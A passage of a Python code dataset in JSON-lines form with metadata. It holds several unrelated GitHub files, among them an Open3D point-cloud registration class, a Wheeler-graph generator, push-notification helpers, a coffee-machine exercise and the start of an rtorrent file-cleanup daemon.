{'id': 'dependencies'}):\n\t\t\tfor ele in tag.find_all('a'):\n\t\t# print(ele.text)\n\t\t\t\tdependencies.append(ele.text)\n\t\t\t\t\n\t\t# Create list of JSON objects\n\t\tlist_of_jsons = []\n\t\tfor line in data_set:\n\t\t\tjson_obj = {\"text\": line}\n\t\t\tlist_of_jsons.append(json_obj)\n\t\tdep = \", \".join(dependencies)\n\t\tdep_obj = [{'text' : dep, \"metadata\": \"list of package dependencies\"}]\n\n\t\t# Create file with data\n\t\twith open('data.jsonl', 'w') as json_file:\n\t\t\tfor ele in list_of_jsons:\n\t\t\t\tjson.dump(ele, json_file)\n\t\t\t\tjson_file.write('\\n')\n\t\t\tfor ele in dep_obj:\n\t\t\t\tjson.dump(ele, json_file)\n\t\t\t\tjson_file.write('\\n')\n\n\t\t# Send file to openAI\n\t\tfile = openai.File.create(file=open(\"data.jsonl\"), purpose='answers')\n\t\ttime.sleep(3)\n\t\tfile_id = file['id']\n\t\treturn file_id\n\telse:\n\t\tprint(\"Package not found\")\n\t\t\n# PACKAGE NAME\npkg_name = input(\"Enter package name: \")\nfile_id = handle_package(pkg_name)\nprint(\"--------------------\")\nprint(\"Type 'exit' to quit.\")\nprint(\"Type 'pkg' to change package.\")\nprint(\"--------------------\")\n# QUESTION:\nq = input(\"Question: \")\n\nwhile q != 'exit':\n\tif q == 'pkg':\n\t\tpkg_name = input(\"Enter package name: \")\n\t\tfile_id = handle_package(pkg_name)\n\t\tq = input(\"Question: \")\n\t# Get an answer\n\tanswer = handle_answer(q, file_id)\n\t\n\tif answer:\n\t\tans = \"\".join(answer['answers'])\n\t\tprint(f\"A: {ans}\")\n\t\tq = input(\"Question: \")\n\telse:\n\t\tprint(\"Couldn't find an answer.\")\n\t\tq = input(\"Question: \")\n\n","repo_name":"awesomner/snyk-explorer","sub_path":"snyker.py","file_name":"snyker.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37465557050","text":"import open3d as o3d\nimport numpy as np\n\n\nclass ReferenceGrid:\n\n def __init__(self, center):\n self.offset = center\n self.spacing = 13e-3\n self.param_long = np.linspace(-100, 100, 1000) * (3 * self.spacing / 100)\n self.param_short = np.linspace(-100, 100, 1000) * (2 * self.spacing / 100)\n self.data = None\n self.pcd = None\n self.is_built = False\n self.pose_graph = None\n self.vertex = None\n\n def generate_vertex(self):\n v = []\n for i in range(-3, 4):\n for j in range(-2, 3):\n for k in range(-2, 3):\n v.append(np.array([i * self.spacing, j * self.spacing, k * self.spacing]))\n v = np.array(v)\n v = self.generate_offset(v)\n self.vertex = o3d.geometry.PointCloud()\n self.vertex.points = o3d.utility.Vector3dVector(v)\n return 0\n\n def generate_offset(self, d):\n for i in range(3):\n d[:, i] += self.offset[i]\n return d\n\n def build(self):\n self.data = []\n\n for i in range(-2, 3):\n x = self.param_long.T\n y = (np.zeros(self.param_long.shape) + i * self.spacing).T\n z = np.zeros(self.param_long.shape)\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, None]), axis=1)\n self.data.append(temp)\n self.data = np.concatenate(self.data)\n new_data = np.copy(self.data)\n for i in range(-2, 3):\n if i != 0:\n new_data[:, 2] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n new_data = []\n for i in range(-2, 3):\n x = np.zeros(self.param_short.shape).T\n y = (np.zeros(self.param_short.shape) + i * self.spacing).T\n z = self.param_short.T\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, None]), axis=1)\n new_data.append(temp)\n new_data = np.concatenate(new_data)\n self.data = np.concatenate((new_data, self.data), axis=0)\n for i in range(-3, 4):\n if i != 0:\n new_data[:, 0] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n new_data = []\n for i in range(-3, 4):\n x = (np.zeros(self.param_short.shape) + i * self.spacing).T\n y = self.param_short.T\n z = np.zeros(self.param_short.shape).T\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, None]), axis=1)\n new_data.append(temp)\n new_data = np.concatenate(new_data)\n self.data = np.concatenate((new_data, self.data), axis=0)\n for i in range(-2, 3):\n if i != 0:\n new_data[:, 2] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n self.is_built = True\n self.data = self.generate_offset(self.data)\n self.generate_vertex()\n print(\"Reference grid built\")\n return 0\n\n def convert(self):\n try:\n self.pcd = o3d.geometry.PointCloud()\n self.pcd.points = o3d.utility.Vector3dVector(self.data)\n print(\"Conversion of grid to point cloud done\")\n except RuntimeError:\n print(\"Error: the grid is not built. Run method build() first.\")\n return 0\n\n def display(self, colour=None):\n if colour is None:\n colour = [0, 1, 0]\n try:\n self.pcd.paint_uniform_color(colour)\n\n ref_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.1, origin=[0, 0, 0])\n\n o3d.visualization.draw_geometries([self.pcd, ref_frame])\n except AttributeError:\n print(\"Error: grid should be built and converted before. Use built() then convert() methods.\")\n return 0\n\n def save_point_cloud(self, path=\"\", name=\"\"):\n try:\n o3d.io.write_point_cloud(path + name + \"_full.ply\", self.pcd)\n o3d.io.write_point_cloud(path + name + \"_vertex.ply\", self.vertex)\n print(\"Reference grid and vertices saved as point clouds\")\n except TypeError or AttributeError:\n print(\"Error: the point cloud does not exist. Build it and convert it first\")\n return 0\n\n def register(self, source, max_correspondence_distance_coarse=10e-5, max_correspondence_distance_fine=1.0e-5):\n print(\"Starting full registration with maximum correspondence distance of \" + str(\n max_correspondence_distance_fine * 1000) + \" mm\")\n # Providing an estimation of the normals of target\n self.pcd.estimate_normals()\n\n # Appending a node chosen for world transformation The vector is 4-dimensional in order to consider\n # transformation from one cloud to the other. Reader should consider both clouds as corresponding to two time\n # frames if the we see these clouds as being part of geometry acquisition with a movie recorder\n self.pose_graph = o3d.pipelines.registration.PoseGraph()\n odometry = np.identity(4)\n self.pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))\n\n # Creating ICP registration\n icp_coarse = o3d.pipelines.registration.registration_icp(source, self.pcd, max_correspondence_distance_coarse,\n np.identity(4),\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n icp_fine = o3d.pipelines.registration.registration_icp(source, self.pcd, max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n\n # Retaining the fine registration as it is the most precise and getting the corresponding transformation\n transformation_icp = icp_fine.transformation\n information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(source, self.pcd,\n max_correspondence_distance_fine,\n icp_fine.transformation)\n\n # Creating the node and edge transformation\n odometry = np.dot(transformation_icp, odometry)\n self.pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))\n self.pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(0,\n 1,\n transformation_icp,\n information_icp,\n uncertain=False))\n\n # Optimizing the transformation\n option = o3d.pipelines.registration.GlobalOptimizationOption(\n max_correspondence_distance=max_correspondence_distance_fine,\n edge_prune_threshold=0.025,\n reference_node=0)\n o3d.pipelines.registration.global_optimization(\n self.pose_graph,\n o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(),\n option)\n\n # Applying the transformation to the target\n # pcd1.transform(pose_graph.nodes[0].pose)\n self.pcd.transform(self.pose_graph.nodes[1].pose)\n self.vertex.transform(self.pose_graph.nodes[1].pose)\n\n print(\"Registration done\")\n print(\"Transformation vector for target:\")\n print(self.pose_graph.nodes[1].pose)\n return self.pose_graph.nodes[1].pose\n","repo_name":"Murnawful/image_distorsion_calculator","sub_path":"irm_dist_calculator/referenceGrid.py","file_name":"referenceGrid.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31588106107","text":"import sys\nimport random\nimport argparse\n\ndef gen_in_node_range(num_nodes, num_labels, root_size):\n grp_size = (num_nodes - root_size) / num_labels\n start = root_size + 1\n ranges = []\n for i in range(num_labels-1):\n # gap = int(grp_size * (1 + random.uniform(-0.05, 0.05))) - 1\n gap = int(grp_size) - 1\n ranges.append((start, start + gap))\n start += gap + 1\n ranges.append((start, num_nodes))\n return ranges\n\ndef split_int(total, group):\n arr = [total // group for i in range(group)]\n arr[-1] += total - sum(arr)\n return arr\n\ndef gen_down(up, start, end, num_node):\n down = [start]\n split_indices = []\n prev = up[0]\n\n for i, elem in enumerate(up[1:]):\n if elem != prev:\n down.append(down[-1])\n split_indices.append(i + 1)\n else: # elem == prev\n down.append(down[-1] + 1)\n prev = elem\n\n assert down[-1] <= end\n\n sample_size = end - down[-1]\n sample_index = random.sample(split_indices, sample_size)\n sample_index = sorted(sample_index)\n\n increm = 0\n it = 0\n for i in range(len(down)):\n if it < len(sample_index) and i == sample_index[it]:\n increm += 1\n it += 1\n down[i] += increm\n\n assert down[-1] == end\n\n return down\n\ndef sum_to(n):\n return sum(list(range(n+1)))\n\ndef get_names(num_nodes, shuffle=True):\n names = [f'S{i}' for i in range(1, num_nodes+1)]\n if shuffle:\n random.shuffle(names)\n return names\n\ndef create_graph(names, edges, filename):\n with open(filename, 'w') as f:\n f.write('strict digraph {\\n')\n for e in edges:\n out_node_name = names[e[0] - 1]\n in_node_name = names[e[1] - 1]\n label = e[2]\n f.write(f'\\t{out_node_name} -> {in_node_name} [ label = {label} ];\\n')\n f.write('}')\n \ndef uniquify(edges):\n return list(set(edges))\n\ndef sort(edges):\n return sorted(edges, key=lambda tup: (tup[2], tup[0], tup[1]))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate Random d-NFA Wheeler Graphs')\n parser.add_argument('-n', '--nodes', type=int, help='Number of nodes', required=True)\n parser.add_argument('-e', '--edges', type=int, help='Number of edges', required=True)\n parser.add_argument('-l', '--labels', type=int, help='Number of edge labels', required=True)\n parser.add_argument('-r', '--root_size', type=int, default=1, help='Number of nodes without incoming edges (default: 1)')\n parser.add_argument('-d', '--dnfa', type=int, default=100000, help='d-NFA (default: 100000)')\n parser.add_argument('-s', '--shuffle', action='store_true', help='Shuffle node names (default: False)')\n parser.add_argument('-o', '--outfile', type=str, default='tmp.dot', help='Output DOT filename (default: ./tmp.dot)')\n args = parser.parse_args()\n\n num_nodes = args.nodes\n num_edges = args.edges\n num_labels = args.labels\n root_size = args.root_size\n d = args.dnfa\n outfile_name = args.outfile\n\n max_num_edge = num_nodes * num_labels + num_nodes - num_labels - root_size\n assert num_edges <= max_num_edge, f'Impossible to generate WG: max # of edges = {max_num_edge}'\n assert num_edges >= num_nodes - root_size, f'Impossible to generate WG: min # of edges = {num_nodes - root_size}'\n assert d is None or d > 0\n\n nodes = list(range(1, num_nodes+1))\n edges = []\n\n in_node_ranges = gen_in_node_range(num_nodes, num_labels, root_size)\n\n num_edges_per_label = split_int(num_edges, num_labels)\n\n for l, (in_node_range, num_edge) in enumerate(zip(in_node_ranges, num_edges_per_label)):\n start, end = in_node_range \n num_node = end - start + 1\n assert num_edge >= num_node\n\n num_node_per_d = [-1] * d\n\n bound1 = num_edge / sum_to(d)\n bound2 = (num_node - 1) / sum_to(d - 1) if d > 1 else 1\n\n if bound1 < bound2:\n num_node_per_d = [int(bound1)] * d\n num_node_per_d[-1] += num_edge - int(bound1) * sum_to(d)\n elif bound2 < bound1:\n num_node_per_d = [int(bound2)] * (d - 1)\n num_node_per_d.append( num_edge - int(bound2) * (sum_to(d) - 1) )\n assert bound1 != bound2\n\n num_out_nodes = sum(num_node_per_d)\n assert num_out_nodes <= num_nodes\n\n # Generate up\n up = []\n a1 = random.sample(nodes, num_out_nodes)\n \n for i, num in enumerate(num_node_per_d):\n a2 = random.sample(a1, num)\n up += a2 * (d - i)\n for elem in a2:\n a1.remove(elem)\n \n up = sorted(up)\n down = gen_down(up, start, end, num_node)\n\n edges += [(a, b, l) for a, b in zip(up, down)]\n\n edges = uniquify(edges)\n edges = sort(edges)\n\n node_names = get_names(num_nodes, shuffle=args.shuffle)\n\n create_graph(node_names, edges, outfile_name)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Kuanhao-Chao/Wheeler_Graph_Toolkit","sub_path":"generator/Random_generator/gen_d-nfa_WG.py","file_name":"gen_d-nfa_WG.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"10705953440","text":"#konwerter zamiana iczby na rzymską\nnumbers={\n 0:\"0\", 1:\"I\", 2:\"II\",3:\"III\",4:\"IV\",5:\"V\"\n}\ndecNum = input(\"Podaj cyfrę 0-5 \")\nif(decNum.isdecimal()):\n decNum = int(decNum)\n if (decNum >= 0 and decNum <= 5):\n print(numbers[int(decNum)])\n else:\n print(\"Liczba jest spoza zakresu 0-5\")\nelse:\n print(\"Błędne dane\")","repo_name":"andrzeji-oss/kursp","sub_path":"dzien2/dzien2_7.py","file_name":"dzien2_7.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3185396700","text":"class CoffeeMachine:\n water = 400\n milk = 540\n beans = 120\n cups = 9\n money = 550\n status = \"standby\"\n\n def buy(self):\n coffee_type = input(\"What do you want to buy? 1 - espresso, 2 - latte, 3 - cappuccino\")\n if coffee_type == \"1\":\n if self.water >= 250:\n if self.beans >= 16:\n if self.cups >= 1:\n print(\"I have enough resources, making you a coffee!\")\n self.water -= 250\n self.beans -= 16\n self.cups -= 1\n self.money += 4\n else:\n print(\"Sorry, not enough cups!\")\n else:\n print(\"Sorry, not enough beans!\")\n else:\n print(\"Sorry, not enough water!\")\n\n elif coffee_type == \"2\":\n if self.water >= 350:\n if self.milk >= 75:\n if self.beans >= 20:\n if self.cups >= 1:\n print(\"I have enough resources, making you a coffee!\")\n self.water -= 350\n self.milk -= 75\n self.beans -= 20\n self.cups -= 1\n self.money += 7\n else:\n print(\"Sorry, not enough cups!\")\n else:\n print(\"Sorry, not enough beans!\")\n else:\n print(\"Sorry, not enough milk!\")\n else:\n print(\"Sorry, not enough water!\")\n\n elif coffee_type == \"3\":\n if self.water >= 200:\n if self.milk >= 100:\n if self.beans >= 12:\n if self.cups >= 1:\n print(\"I have enough resources, making you a coffee!\")\n self.water -= 200\n self.milk -= 100\n self.beans -= 12\n self.cups -= 1\n self.money += 6\n else:\n print(\"Sorry, not enough cups!\")\n else:\n print(\"Sorry, not enough beans!\")\n else:\n print(\"Sorry, not enough milk!\")\n else:\n print(\"Sorry, not enough water!\")\n else:\n print(\"\"\"What do you want to buy? \n 1 - espresso,\n 2 - latte,\n 3 - cappuccino\"\"\")\n\n def fill(self):\n print(\"Write how many ml of water do you want to add:\")\n water_fill = int(input())\n self.water += water_fill\n print(\"Write how many ml of milk do you want to add:\")\n milk_fill = int(input())\n self.milk += milk_fill\n print(\"Write gow many grams of coffee beans do you want to add:\")\n beans_fill = int(input())\n self.beans += beans_fill\n print(\"Write how many disposable cups of coffee do you want to add:\")\n cups_fill = int(input())\n self.cups += cups_fill\n\n def take(self):\n print(\"I gave you ${}\".format(self.money))\n self.money -= self.money\n\n def remaining(self):\n print(\"The coffee machine has:\")\n print(\"{} of water\".format(self.water))\n print(\"{} of milk\".format(self.milk))\n print(\"{} of coffee beans\".format(self.beans))\n print(\"{} of disposable cups\".format(self.cups))\n print(\"${} of money\".format(self.money))\n\n def action(self):\n print(\"Write action (buy, fill, take, remaining, exit):\")\n self.status = input()\n if self.status == \"remaining\":\n self.remaining()\n elif self.status == \"buy\":\n self.buy()\n elif self.status == \"fill\":\n self.fill()\n elif self.status == \"take\":\n self.take()\n\n\nmachine = CoffeeMachine()\nwhile machine.status != \"exit\":\n machine.action()\n","repo_name":"HydroVictor/Study_Projects-Jet-Brains-Academy-","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72391611961","text":"import logging\n\nfrom exponent_server_sdk import (\n DeviceNotRegisteredError,\n PushClient,\n PushMessage,\n PushServerError,\n PushTicketError,\n)\n\nfrom frux_chat.services.database import database\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setFormatter(\n logging.Formatter('[%(asctime)s] [%(levelname)s] %(module)s: \"%(message)s\"')\n)\nlogger.addHandler(handler)\nlogger.setLevel(logging.INFO)\n\n\ndef notify_device(token, title='', body='New event!', notification_data=None):\n logger.info('Sending new notification: -- %s -- %s -- %s', token, title, body)\n if not notification_data:\n notification_data = {}\n try:\n PushClient().publish(\n PushMessage(to=token, title=title, body=body, data=notification_data)\n )\n except (ValueError, DeviceNotRegisteredError, PushServerError, PushTicketError):\n pass\n\n\ndef set_tag_and_project(tag, project_id):\n '''Mix the tag and the project to store in the database'''\n return f'{tag}_{project_id}'\n\n\ndef notify_tag(tag, project_id, params):\n # TODO: Bulk notifications/inserts\n title, body = TAG_MAPPER[tag](params)\n users = database.get_subscriptions_users(set_tag_and_project(tag, project_id))\n notification_data = {'project_id': project_id}\n for user in users:\n notify_device(user['token'], title, body, notification_data)\n database.insert_notification(user['_id'], title, body, project_id)\n\n\n# Notifications Specccc\n# NewSeederNotification -> X fundeo tu proyecto\n# NewStageNotification_noncreator -> El proyecto entro en tal stage (similar a la de abajo)\n# NewStageNotification_creator -> El veedor te dio los funds para tal stage\n# NewSeer_creator -> Se asigno un veedor a tu proyecto\n# NewSeer_seer -> Se te asigno un proyecto para que seas el seer\n# ChangeStateNotification -> El proyecto entro en funding, el proyecto entro en inprogress, el proyecto se completo\n\n\ndef new_seeder(data):\n project = data['project']\n username = data['username']\n return ('New seeder!', f'{username} has started funding {project}!')\n\n\ndef change_state(data):\n project = data['project']\n state = data['state']\n if state == \"FUNDING\":\n body = f'{project} is looking for new seeders!'\n if state == \"IN_PROGRESS\":\n body = f'{project} has started development!'\n if state == \"COMPLETE\":\n body = f'{project} has finished development!'\n return ('New progress!', body)\n\n\ndef new_stage_non_creator(data):\n project = data['project']\n stage_number = data['stage_number']\n return (\n 'Stage finished!',\n f'{project} has started developing their Stage {stage_number}!',\n )\n\n\ndef new_stage_creator(data):\n project = data['project']\n stage_number = data['stage_number']\n name = data['username']\n return (\n 'Stage funds released!',\n f'{name} has released the funds for Stage {stage_number} of {project}!',\n )\n\n\ndef new_seer_creator(data):\n project = data['project']\n name = data['username']\n return ('Seer assigned!', f'{name} has been assigned as the {project} supervisor!')\n\n\ndef new_seer_seer(data):\n project = data['project']\n return ('Project assigned!', f'You\\'ve been assigned to supervise {project}!')\n\n\nTAG_MAPPER = {\n 'NewSeederNotification': new_seeder,\n 'NewStageNotification_noncreator': new_stage_non_creator,\n 'NewStageNotification_creator': new_stage_creator,\n 'NewSeer_creator': new_seer_creator,\n 'NewSeer_seer': new_seer_seer,\n 'ChangeStateNotification': change_state,\n}\n\n\n# Role Specccc\n# ProjectCreator\n# - Quien se suscribe? el creador de un proyecto al crearlo\n# - Que notificaciones recibe? NewSeederNotification, NewStageNotification_creator, NewSeer_creator, ChangeStateNotification,\n# ProjectWatcher\n# - Quien se suscribe? los que dieron like\n# - Que notificaciones recibe? ChangeStateNotification,\n# ProjectSeer\n# - Quien se suscribe? el veedor de un proyecto\n# - Que notificaciones recibe? NewSeederNotification, NewSeer_seer, ChangeStateNotification\n# ProjectSeeder\n# - Quien se suscribe? los que invirtieron en el proyecto\n# - Que notificaciones recibe? NewStageNotification_noncreator\n# El chat NO se maneja por suscripciones\n\n\nROLE_MAPPER = {\n 'ProjectCreator': [\n 'NewSeederNotification',\n 'NewStageNotification_creator',\n 'NewSeer_creator',\n 'ChangeStateNotification',\n ],\n 'ProjectWatcher': ['ChangeStateNotification'],\n 'ProjectSeer': [\n 'NewSeederNotification',\n 'NewSeer_seer',\n 'ChangeStateNotification',\n ],\n 'ProjectSeeder': ['NewStageNotification_noncreator'],\n}\n","repo_name":"JDSanto/frux-chat","sub_path":"frux_chat/services/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29330832962","text":"from flask import request\nimport requests\n\nfrom logs.printLog import printLog\n\n'''\n Retrieves text from view-only Google docs\n Input: URL of google doc\n Output: text of google doc\n'''\ndef acquireGoogle(url):\n printLog(\"URL is \" + url)\n r = requests.get(url)\n content = r.text\n intel = processGoogleIntel(content)\n\n return intel\n\ndef processGoogleIntel(content):\n splitIntel = content.split('DOCS_modelChunk = [')\n\n intel = ''\n\n for chunk in splitIntel:\n bracketIndex = chunk.find('}')\n sIndex = chunk.find('s\":\"')\n chunk = chunk[sIndex + 4:bracketIndex]\n intel += chunk\n\n parsedIntel = intel.replace('\\\\n', '
    ')\n parsedIntel = parsedIntel.replace(\"\\\\u0027\", \"'\")\n parsedIntel = parsedIntel.replace('\\\\\"', '\"')\n parsedIntel = parsedIntel.replace('\\\\t', ' ')\n\n return parsedIntel","repo_name":"SarahCooperDev/Caper","sub_path":"models/mark_google.py","file_name":"mark_google.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4427646707","text":"from django.urls import path\n\nfrom users.views import UserRegisterAPIView, UserLoginAPIView, UserLogoutAPIView\n\napp_name = 'users'\n\nurlpatterns = [\n path('', UserRegisterAPIView.as_view(), name=\"list\"),\n path('login/', UserLoginAPIView.as_view(), name='login'),\n path('logout/', UserLogoutAPIView.as_view(), name='logout'),\n]","repo_name":"SageOfDev/DrfForTdd","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9674661179","text":"#!/usr/bin/python3.5\n\n# NOTES:\n# * Various features require 3.5+\n# * to install inotify library https://github.com/dsoprea/PyInotify\n# (i.e. https://pypi.python.org/pypi/inotify)\n# pip3 install --user inotify\n# git clone; cd; python3.5 setup.py install --user\n# * same with daemons (optional unless --daemon used)\n# https://github.com/kevinconway/daemons\n# https://pypi.python.org/pypi/daemons\n# pip3 install --user daemons\n\n# TODO:\n# * make logging work before and after daemonizing things so we get the PID in\n# the log file too\n# * fix resolve usages\n# * add config file?\n# * deal with duplicate hash's across trackers?\n# * if anything is in the retry queue, we'll never handle removed torrents. Not\n# sure if that is right or not.\n# * make an exception class and use it with errors so as not to break out of\n# loop except when an unexpected exception occurs\n# * better logging, especially with --clean\n# * better torrent bdecoding (i.e. keys etc to strings)\n# https://github.com/lostnihilist/bencode.py\n# https://github.com/fuzeman/bencode.py\n# * use better transaction handling to speed up insertions?\n\n\n#sys.argv.extend(('-v', '-v', '-v', '-r', '-n', '~/.config/rtorrent/session', '~/files', '~/seed'))\nimport argparse\nimport logging\nimport math\nimport os\nimport re\nimport sqlite3\nimport string\nimport sys\nimport time\n\nfrom collections import deque, namedtuple, OrderedDict\nfrom math import ceil\nfrom pathlib import Path, PosixPath\nfrom urllib.parse import urlparse\n\nimport bencode\n\nfrom inotify.adapters import Inotify\nfrom inotify.constants import IN_CREATE, IN_DELETE\n\n# not available in 3.5 on whatbox, fuck these people, and no pip\n#from chardet import detect\n\n\nLOG_FILE = Path(\"~/.config/rtorrent_event/event.log\")\nSQL_FILE = Path(\"~/.config/rtorrent_event/file.db\")\nHOOK_FILE = \"~/.config/rtorrent_event/hooks.py\"\nPID_FILE = Path(\"~/.local/var/run/rtorrent_event.pid\").expanduser()\nSLEEP_TIME = 3 #seconds\n\ndef adapt_path(path):\n \"Convert PosixPath to appropriate type for sqlite, i.e. a string\"\n return str(path).encode('utf-8')\n\ndef convert_path(s):\n \"from bytes from sqlite db to PosixPath\"\n return PosixPath(s.decode('utf-8'))\n\nsqlite3.register_adapter(Path, adapt_path)\nsqlite3.register_adapter(PosixPath, adapt_path)\nsqlite3.register_converter(\"path\", convert_path)\n\nclass rTorEventException(Exception):\n pass\n\nclass rTorFileNotFoundError(rTorEventException):\n pass\n\nRmTuple = namedtuple('RmTuple',\n ('name', 'tracker', 'hash', 'rmfiles', 'torfiles', 'tor',\n 'ltor', 'rtor'))\n\ndef parse_args():\n p = argparse.ArgumentParser(\n description=\"Scan folders and rtorrent session, removing unused files.\")\n p.add_argument('session', action='store',\n help=\"rtorrent session folder location.\")\n p.add_argument('paths', nargs='*', action='store', default=(),\n help=\"Paths to remove files from and/or check db against.\")\n me = p.add_mutually_exclusive_group()\n me.add_argument('--clean', action='store_true',\n help=\"\"\"\n Scan the FS and DB for conflicting information and remove\n rows from DB to make consistent. Rtorrent needs to not be\n running or will exit without action, unless --force given.\n Cannot be run in daemon mode. Use with --remove to remove\n orphaned files (files on disk but not in db). Paths are\n required when specified.\n \"\"\")\n me.add_argument('-d', '--daemon', action='store_true',\n help=\"\"\"\n Fork off to a daemon, implies \"--sleep --log '%s'\",\n unless --log/--sleep are specified.\n \"\"\" % LOG_FILE)\n p.add_argument('-f', '--force', action='store_true',\n help=\"Clean up even if rtorrent is running.\")\n p.add_argument('--log-file', action='store', default=LOG_FILE,\n help=\"What file to use as log file, defaults to %s.\" %\n str(LOG_FILE))\n p.add_argument('--no-log', action='store_true',\n help=\"do not write a log file.\")\n p.add_argument('-q', '--quiet', action='store_true',\n help=\"suppress output on stdout/stderr. Does not effect log file.\")\n p.add_argument('-n', '--no-action', action='store_true',\n help=\"\"\"\n Print what would happen, but do not execute. Cannot use\n --daemon.\n \"\"\")\n p.add_argument('-r', '--remove', action='store_true',\n help=\"\"\"\n Remove files on disk if no longer in db, during normal\n operation or in --clean. This is effectively the last\n pre_remove hook run before removing data from database. By\n default, any \"orphaned\" files are removed, but if paths\n arguments are specified, only files in those directories\n that are orphaned will be removed. \"Orphaned\" means that\n the files are no longer associated with any torrents.\n \"\"\")\n p.add_argument('--sleep', action='store', type=int, default=SLEEP_TIME,\n help=\"\"\"\n How long to sleep when no fs action is detected (seconds).\n Default: %(default)s\n \"\"\")\n p.add_argument('--sql-file', action='store', default=SQL_FILE, type=Path,\n help=\"Where to store history. Default: %s\" % str(SQL_FILE))\n p.add_argument('-v', '--verbose', action='count', default=0,\n help=\"Enable higher verbosity levels (up to 4 times).\")\n p.add_argument('--hooks', nargs='?', action='store', default=None,\n const=HOOK_FILE,\n help=\"\"\"\n A file of python code with hook functions to run. If\n argument specified without argument, '%s' is used as the\n hook file. See README for details on the hooks. \n \"\"\" % HOOK_FILE)\n p.add_argument('--clean-lockfile', action='store_true',\n help=\"Remove a lockfile. I DO NOT CHECK IF IT IS STALE!\")\n args = p.parse_args()\n args.paths = tuple(Path(x).expanduser().resolve() for x in args.paths)\n args.session = Path(args.session).expanduser()\n args.sql_file = args.sql_file.expanduser()\n if not args.session.is_dir():\n p.error(\"Session directory must exist and be a directory.\")\n if not all(x.is_dir() for x in args.paths):\n p.error(\"Paths must exist and be a directories.\")\n if args.daemon and args.no_action:\n p.error(\"Can only specify one of --no-action and --daemon.\")\n args.log_file = args.log_file.expanduser() if not args.no_log else None\n if args.hooks:\n args.hooks = Path(args.hooks).expanduser()\n if not args.hooks.exists():\n p.error(\"Hook file must exist if specified.\")\n if args.clean and not args.paths:\n p.error(\"Paths must be specified with --clean.\")\n return args\n\ndef is_parent(parent, child):\n \"is candidate parent an actual parent of child (Paths or strings\"\n return os.path.commonpath((str(parent), str(child))) == str(parent)\n\ndef common_parent(*files, are_absolute=False):\n \"\"\"\n get the deepest directory common to all files/directories.\n\n all files must exist while call is executing\n \"\"\"\n if not files:\n return None\n if not are_absolute:\n files = [x.absolute() for x in files]\n base_dir = files[0] if files[0].is_dir() else files[0].parent\n for cmpfile in files:\n for i, (bp, cp) in enumerate(zip(base_dir.parts, cmpfile.parts)):\n if bp != cp:\n if i < 0:\n return None\n # have to map from parts idx to parents idx, annoying\n parent_idx = len(base_dir.parts) - 1 - i\n base_dir = base_dir.parents[parent_idx]\n return base_dir\n\ndef tabnew_line_join(objs):\n \"join objs with newline, prepending each line with tab\"\n return '\\n'.join('\\t%s' % str(x) for x in objs)\n\ndef human_filesize(size, binary=True, digits=1, unit=None, bits=False,\n inbinary=True, inunit='', inbits=False):\n \"\"\"\n convert number of bytes to human readable size as string\n\n binary: use 1024 system. False to use decimal. iB versus B in output\n digits: how many digits after decimal point to report\n unit: None to determine automatically, else one of KMGTPEZ,\n '' for Bytes.\n bits: output in bits or bytes (default: bytes) (b vs B in output)\n inbinary: input in binary, applies only if inunit != ''\n inunit: '' for bytes, KMGTPEZ for higher order\n inbits: is the input in bits or bytes. default bytes\n \"\"\"\n fmt = \"%%1.%df %%s%%s\" % digits\n units = ('', 'K', 'M', 'G', 'T', 'P', 'E', 'Z')\n divsuf = [(1000, 'B'), (1024, 'iB')]\n size *= divsuf[inbinary][0]**units.index(inunit) / (1,8)[inbits]*(1,8)[bits]\n div, suf = divsuf[binary]\n if size <= 0: # log(0) undefined\n unit = ''\n unit = (unit if unit is not None else\n units[min(math.floor(math.log(size, div)), len(units)-1)])\n size /= div ** units.index(unit)\n unit = unit if unit != 'K' or binary else 'k' # strictly, in SI k not K\n suf = 'B' if unit == '' else suf\n suf = suf.lower() if bits else suf\n return fmt % (size, unit, suf)\n\ndef build_fs_file_set(*paths):\n \"Return a set of PosixPath objects representing the files in paths\"\n s = set()\n for path in paths:\n for pd, ds, fs in os.walk(str(path)):\n s.update(Path(pd, f).resolve() for f in fs)\n return s\n\ndef 